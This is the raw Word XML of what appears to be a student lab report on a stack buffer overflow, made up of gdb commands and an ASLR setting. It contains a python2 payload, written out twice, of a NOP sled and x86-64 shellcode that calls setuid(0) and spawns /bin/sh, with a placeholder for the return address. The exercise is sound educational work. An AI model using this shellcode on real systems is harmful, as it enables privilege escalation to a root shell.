    <w:p w14:paraId="72AB40F2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E768B2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disass main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA8425C" w14:textId="62BDF49A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7A31618F" wp14:editId="0DA0893F">
            <wp:extent cx="5943600" cy="2910205"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1378101379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1379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D17D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9F6ADF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run $(python2 -c"print 'A'*200 + 'B'*8 + 'C'*8 + 'D'*6")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D3CB45" w14:textId="28844DC5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378B44B" wp14:editId="09E4C5C8">
            <wp:extent cx="5943600" cy="887095"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1873649939" name="Picture 7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9939" name="Picture 7" descr="A computer screen shot of a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033D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CB07AA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info registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF1C9B0" w14:textId="775DC035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8A97923" wp14:editId="4CABD6D6">
            <wp:extent cx="5943600" cy="2164715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2126360425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60425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6957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A7CE096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x/100x $rsp-200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C093E3" w14:textId="52B3C96D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78991006" wp14:editId="7F469AF6">
            <wp:extent cx="5943600" cy="4998085"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1812840012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40012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4A8C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96C9F4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run $(python2 -c "print 'x90'*152 + '^[[200~\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCE8176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  x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70497464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  xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D030914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  x0f\x05' + 'B'*8 + 'c'*8 + '&lt;Mot dia chi bat ky o vi tri 0 toi 152 cua buffer&gt;'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08801BB6" w14:textId="3A81C631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2308ADFE" wp14:editId="320D123F">
            <wp:extent cx="5943600" cy="3207385"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="179080115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01151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C79F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FDE292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sudo sysctl kernel.randomize_va_space=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E9E3A4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CED3EF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gdb -q buf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A54AFF" w14:textId="605C2ADE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F07ADD6" wp14:editId="349557F5">
            <wp:extent cx="5943600" cy="2592705"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="742954971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54971" name="Picture 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E3F0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set disassembly-flavor intel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14475D16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CAC1E1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disass main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7C80A5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6024B7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run $(python2 -c"print 'A'*200 + 'B'*8 + 'C'*8 + 'D'*6")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6D541A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0403832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info registers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB8AC55" w14:textId="387DC4E8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04A4A5F1" wp14:editId="2F99C094">
            <wp:extent cx="5943600" cy="2068195"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="81916086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60863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0E60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0C3603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x/100x $rsp-200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708119AE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C32D83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- run $(python2 -c "print 'x90'*152 + '^[[200~\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B5B377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  x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B28A8A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  xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16798D5A" w14:textId="77777777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color w:val="000000"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>  x0f\x05' + 'B'*8 + 'c'*8 + '&lt;Mot dia chi bat ky o vi tri 0 toi 152 cua buffer&gt;'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50307888" w14:textId="2A5DE6BC" w:rsidR="00025DBA" w:rsidRPr="00025DBA" w:rsidRDefault="00025DBA" w:rsidP="00025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5D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B7EAEB2" wp14:editId="30FE6463">
            <wp:extent cx="5943600" cy="4356100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17174540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54067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CB17" w14:textId="77777777" w:rsidR="00D94F67" w:rsidRDefault="00D94F67" w:rsidP="00323ED0"/>
    <w:p w14:paraId="471B8A04" w14:textId="77777777" w:rsidR="00323ED0" w:rsidRDefault="00323ED0" w:rsidP="00EE027A"/>
    <w:sectPr w:rsidR="00323E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1321"/>
    <w:rsid w:val="00025DBA"/>
    <w:rsid w:val="001E1B05"/>
    <w:rsid w:val="002614DA"/>
    <w:rsid w:val="002C16D1"/>
    <w:rsid w:val="00323ED0"/>
    <w:rsid w:val="003E1321"/>
    <w:rsid w:val="006C5025"/>
    <w:rsid w:val="0071032C"/>
    <w:rsid w:val="00755988"/>
    <w:rsid w:val="007E4AFE"/>
    <w:rsid w:val="008060AE"/>
    <w:rsid w:val="008A1C0F"/>
    <w:rsid w:val="008E5CB5"/>
    <w:rsid w:val="0097314C"/>
    <w:rsid w:val="00A723AC"/>
    <w:rsid w:val="00A735FD"/>
    <w:rsid w:val="00B46777"/>
    <w:rsid w:val="00B50A54"/>
    <w:rsid w:val="00C1168D"/>
    <w:rsid w:val="00D94F67"/>
    <w:rsid w:val="00EE027A"/>
    <w:rsid w:val="00EE1675"/>
    <w:rsid w:val="00EE5430"/>
    <w:rsid w:val="00F5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7FF7A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9780BDDC-3B7B-494E-9CB8-8D22255D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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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32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25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25D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hyperlink" Target="https://samsclass.info/127/proj/ED3a.c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16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Văn  Duy</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Thái Văn  Duy</cp:lastModifiedBy>
  <cp:revision>20</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-22T06:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-22T10:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>